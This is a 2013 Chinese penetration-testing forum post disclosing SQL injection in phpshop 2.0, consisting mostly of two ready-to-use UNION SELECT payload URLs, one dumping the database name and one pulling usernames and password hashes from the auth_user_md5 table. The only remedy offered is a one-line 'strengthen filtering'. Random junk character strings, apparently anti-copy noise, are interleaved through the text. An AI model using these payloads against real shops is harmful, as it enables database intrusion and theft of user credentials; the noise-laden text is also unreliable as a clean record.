中国网络渗透测试联盟
标题:
phpshop 2.0 SQL注入及修复
[打印本页]
作者:
admin
时间:
2013-1-18 18:24
标题:
phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
0 }: C( m3 c' C8 v4 {2 d3 v
/ C& J! s- w1 d7 N* A
作者 : By onestree
6 V: W" G4 B6 V9 i4 d, u9 `
下载地址 :
http://code.google.com/p/phpshop/downloads/list
3 M2 `5 _6 O2 R) r* i
测试地址: windows 7 / ubuntu
8 y3 N- M3 J$ w' F
7 F- s6 X+ E% a: G+ B1 u
, @" C8 U3 k) J) q! @9 o! k
SQLi p0c:
7 x# ^, L% r- i: {) d. m
, @9 R( x& O% s# D+ v8 n4 R& s
==================
. c2 e: c% D. j
/ A% z* D+ z* f0 R( s* y5 o( K+ O
http://www.xxx.com
/phpshop 2.0/?page=admin/function_list&module_id=11'
( i4 A6 M, q! @# `* Z& L
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
* Y8 P* k- ^2 U* J4 ?5 ~$ M
( r6 \$ d5 h& M$ F
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
& B( V5 @ ~$ s5 U* K4 y( G" U
% ~% U# F1 C0 b/ ~, a- i
修复:
3 R& J* v5 x5 e- y; S% r
加强过滤
2 [/ p% O- [4 Z y
6 ?( v" y- g, a5 w1 f" u( s
. s0 R( n8 _6 \" w; W
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2